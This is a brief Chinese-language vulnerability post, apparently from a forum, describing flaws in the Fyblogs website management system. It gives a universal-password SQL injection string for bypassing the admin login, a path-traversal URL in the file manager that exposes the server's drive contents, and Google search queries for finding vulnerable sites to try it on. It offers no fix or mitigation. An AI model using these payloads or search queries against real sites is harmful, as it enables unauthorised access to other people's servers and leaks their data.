Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过简要描述:
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
详细说明:
后台万能密码 'or'='or'
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
admin/uploadfile.asp?currentFolder=/upfiles/../
漏洞证明:
谷歌:inurl:type.asp?id=1 新闻中心
或者 :inurl:download_ok.asp?
可以测试
页:
[1]